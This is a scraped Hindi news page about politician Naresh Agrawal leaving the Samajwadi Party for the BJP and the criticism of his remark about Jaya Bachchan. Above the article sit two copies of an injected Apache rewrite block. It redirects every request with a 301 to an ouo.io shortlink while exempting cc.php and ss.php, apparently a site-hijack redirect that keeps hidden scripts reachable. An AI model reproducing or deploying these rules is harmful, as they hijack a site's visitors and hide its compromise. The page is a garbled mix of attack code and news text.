
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 709
Nextनई दिल्ली। समाजवादी पार्टी द्वारा राज्यसभा में नहीं भेजे जाने से नाराज नरेश अग्रवाल ने आज सपा छोड़कर भाजपा का दामन थाम लिया। नरेश अग्रवाल ने भाजपा का दामन थामते ही ऐसा बयान दे डाला जिसके कारण भाजपा नेता असहज हो गए। प्रेस कॉन्फ्रेंस के दौरान उन्होंने कहा कि संसद के उच्च सदन में नामांकन के लिए उनसे ज्यादा डांसरों और फिल्म कलाकारों को तवज्जो दी गई। सपा के राज्यसभा सदस्य अग्रवाल ने कहा, मेरी तुलना फिल्मों में काम करने वालों से की गई..मुझे फिल्मों में नाचने और उसमें काम करने वालों के लिए नकारा गया। मुझे यह उचित नहीं लगा। किसी को यह ठीक नहीं लगा।
उन्होंने फिल्म अभिनेत्री व राज्यसभा सांसद जया बच्चन के फिर से राज्यसभा चुनाव में नामांकन के संदर्भ में यह बात कही। लेकिन,जया पर विवादित टिप्पणी के बाद बीजेपी ने खुद को नरेश अग्रवाल के बयान से अलग कर लिया है। बीजेपी के प्रवक्ता संबित पात्रा ने अग्रवाल की टिप्पणी से पार्टी को अलग बताया और कहा कि उनकी पार्टी सभी क्षेत्रों के लोगों का सम्मान करती है और राजनीति में उनका स्वागत करती है। केंद्रीय विदेश मंत्री और पार्टी की वरिष्ठ नेता सुषमा स्वराज ने भी अग्रवाल के बयान पर आपत्ति जताई है। उन्होंने ट्वीट किया, नरेश अग्रवाल भारतीय जनता पार्टी में शामिल हुए हैं। उनका स्वागत है, लेकिन जया बच्चन जी के विषय में उनकी टिप्पणी अनुचित एवं अस्वीकार्य है।
भाजपा में शामिल होने को घर वापसी करार देते हुए अग्रवाल ने कहा कि पार्टी जो भी उनसे चाहेगी, वह बिना शर्त करने के लिए तैयार हैं। उन्होंने कहा, मैं राज्यसभा टिकट के लिए भाजपा में शामिल नहीं हुआ हूं और न ही मैंने कोई शर्त रखी है। राज्यसभा में पिछले कई सालों से भाजपा और नरेंद्र मोदी सरकार के सबसे मुखर आलोचकों में से एक अग्रवाल ने प्रधानमंत्री और भाजपा अध्यक्ष अमित शाह की तारीफ की। अग्रवाल ने अपने 30 साल के राजनीतिक करियर में बार-बार पार्टी बदली है। इससे पहले वह जगदम्बिका पाल, राजीव शुक्ला और श्याम सुंदर शर्मा के साथ अखिल भारतीय लोकतांत्रिक कांग्रेस में थे जिसने वर्ष 1997 में उत्तर प्रदेश में भाजपा के कल्याण सिंह के नेतृत्व वाली सरकार के साथ गठबंधन किया था।